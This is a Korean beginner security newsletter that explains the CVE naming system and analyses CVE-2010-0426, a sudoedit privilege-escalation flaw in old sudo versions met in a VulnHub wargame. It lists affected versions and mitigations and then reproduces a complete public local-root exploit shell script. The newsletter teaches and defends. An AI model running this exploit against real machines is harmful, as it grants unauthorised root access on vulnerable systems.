CVE

CVE-2010-0426

로컬 파일 실행을 통한 권한 상승 취약점

2025.10.06 | 조회 207 |
1
|

Tori 해킹 일지의 첫 발걸음 👟

안녕하세요, 구독자님 💌

보안 뉴스레터를 발행하는 Tori입니다 😃

이번에 해킹·보안 공부를 새롭게 시작하면서, 기초부터 하나하나 다져보자는 마음으로 개념들을 정리하기 시작했어요. 그러다 보니 저처럼 처음 배우는 분들과 함께 나누고 싶다는 생각이 들어 이렇게 뉴스레터를 준비하게 되었습니다.

저도 아직 배워가는 과정에 있는 초심자이지만, 차근차근 함께 공부하며 성장해 나가면 좋겠습니다 ✨

그럼, 첫 번째 이야기 시작해 볼까요? 🚀

첨부 이미지

 

오늘은 ‘CVE’과 ‘CVE-2010-0426 취약점 분석’에 대해 이야기 해보고 해요!!

제가보안을 처음 접했을 때 제일 어려웠던 점이 새로운 용어가 너무 많다는 거였어요. 대화 중에 모르는 단어가 계속 나오니까, 그때그때 찾아보고 물어보면서 겨우 따라갔죠 🥹 하지만 그냥 넘기면 금세 잊어버리게 되더라고요.  

그래서 이번 뉴스레터에서는 개념을 차근차근 정리하면서 구독자님과 함께 공부해 보려고 해요. 앞으로는 보안 용어를 하나씩 풀어 쓰고, 관련 취약점 사례도 함께 소개할 예정이에요 ✍🏻

 혹시 궁금한 용어나 다뤄줬으면 하는 취약점이 있다면 편하게 알려주세요

— 다음 호에 꼭 반영하겠습니다! 💪🏻

 

 

오늘의 단어 ✨ CVE ✨

CVE( Common Vulnerabilities and Exposures )는 공개된 사이버 취약점에 이름표를 붙여 주는 표준 체계예요. 쉽게 말해, 세상에 알려진 취약점들이 서로 다른 곳에서 제각각 불리지 않도록 공통 이름을 달아 주는 거죠 😊

각 취약점에는 CVE ID가 붙어요. 예를 들어 CVE-2010-0426처럼요. 이 ID 덕분에 다양한 보안 도구와 데이터베이스에서도 같은 취약점을 같은 이름으로 찾아볼 수 있어요.

이 프로그램은 미국의 비영리 연구기관 MITRE에서 운영하고, CISA가 지원해요. 덕분에 전 세계가 같은 기준으로 취약점을 정리하고 공유할 수 있어요 🔎

CVE 구성 설명
CVE 구성 설명

CVE ID만 알면 보고서나 패치 노트, 보안 공지에서 관련 정보를 한 번에 모을 수 있고, 우리 팀의 대응 우선순위를 정할 때도 공통 언어처럼 편하게 쓸 수 있어요. 실무에서 진짜 많이 쓰이니 익숙해지면 큰 도움이 돼요 💪🏻 어때요? 이제 CVE가 훨씬 친근하게 느껴지죠?

그럼 바로 오늘의 주인공, CVE-2010-0426을 만나볼까요! 🚀

 

 

파일 하나 실행했을 뿐인데, 권한이 뿅 하고 올라간다고요⁉️

오늘의 CVE: CVE-2010-0426 — sudoedit 권한 혼동으로 로컬 권한 상승 🔒

 

제가 요즘 VulnHub에서 주 1회 이상 워게임을 풀고 있는데, 최근에 도전했던 PumpkinGarden 문제에서 이 취약점을 활용해 로컬 권한 상승을 수행하는 과정을 직접 경험했습니다.

첨부 이미지

PumpkinGarden 점검 결과, 대상 서버에 취약한 구버전 sudo가 설치되어 있었어요. 이 이슈는 sudo가 특정 설정에서 의사 명령 sudoedit 과 사용자가 만든 같은 이름의 실행파일을 혼동하면서 발생해요. 공격자가 쓰기 가능한 폴더에 sudoedit라는 파일을 만들어 두고, sudoers에서 그 사용자에게 sudoedit 사용이 허용되어 있으면, 그 가짜 파일이 루트 권한으로 실행될 수 있어요. 

  • sudoers : 어떤 사용자가 어떤 명령을 어떤 권한으로 쓸 수 있는지 적어두는 설정 파일
  • sudoedit : sudo -e로 허용된 파일만 관리자 권한으로 편집하게 하는 의사 명령

 

영향 버전

  • sudo 1.6.x < 1.6.9p21
  • sudo 1.7.x < 1.7.2p4

 

취약점 원인 분석

sudoers의사 명령 sudoedit 과 파일시스템의 동일 이름(sudoedit) 실행파일매칭될 여지가 있었기 때문이에요. 그 결과, 사용자가 만든 실행파일이 sudoedit 권한으로 실행될 위험이 생겼어요.

 

대응 방안

  • sudo를 패치 버전 이상으로 업데이트 해주세요!
  • sudoers에서 sudoedit 허용 범위를 최소화 하고, 꼭 필요한 파일만 지정해주세요.
  • secure_path를 사용해 실행 경로를 안전하게 고정해주세요.
  • sudo -e 사용 이력과 비정상 파일 존재 여부를 주기적으로 점검해주세요

 


참고로 이해를 돕기 위해, 당시 사용된 CVE 익스플로잇 코드를 아래에 첨부하겠습니다!

#!/bin/sh
# Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
# local root exploit
# March 2010
# automated by kingcope
# Full Credits to Slouching
echo Tod Miller Sudo local root exploit
echo by Slouching
echo automated by kingcope

if [ $# != 1 ]
then
echo "usage: ./sudoxpl.sh <file you have permission to edit>"
exit
fi
cd /tmp
cat > sudoedit << _EOF
#!/bin/sh
echo ALEX-ALEX
su
/bin/su
/usr/bin/su
_EOF
chmod a+x ./sudoedit
sudo ./sudoedit $1

 

오늘의 뉴스레터를 끝까지 읽어 주셔서 감사해요, 구독자님 💌

Tori는 구독자님의 든든한 보안 동반자가 되기 위해 계속 공부하고 기록할게요 🐿️

다음 호에는 더 알찬 내용으로 찾아뵐게요!! 유용했다면 동료에게도 살짝 공유해 주세요 ✨

그럼 다음 일지에서 만나요! 🙌

 

다가올 뉴스레터가 궁금하신가요?

지금 구독해서 새로운 레터를 받아보세요

✉️

이번 뉴스레터 어떠셨나요?

tori 해킹 일지 님에게 ☕️ 커피와 ✉️ 쪽지를 보내보세요!

댓글 1개

의견을 남겨주세요

확인
  • 0101의 프로필 이미지

    0101

    0
    7달 전

    비공개 댓글 입니다. (메일러와 댓글을 남긴이만 볼 수 있어요)

    ㄴ 답글

다른 뉴스레터

© 2026 tori 해킹 일지

"tori 해킹 일지"는 해킹 기법과 취약점 분석을 매주 쉽게 풀어내는 보안 뉴스레터입니다.

메일리 로고

도움말 오류 및 기능 관련 제보

서비스 이용 문의admin@team.maily.so 채팅으로 문의하기

메일리 사업자 정보

메일리 (대표자: 이한결) | 사업자번호: 717-47-00705 | 서울특별시 송파구 위례광장로 199, 5층 501-8호

이용약관 | 개인정보처리방침 | 정기결제 이용약관 | 라이선스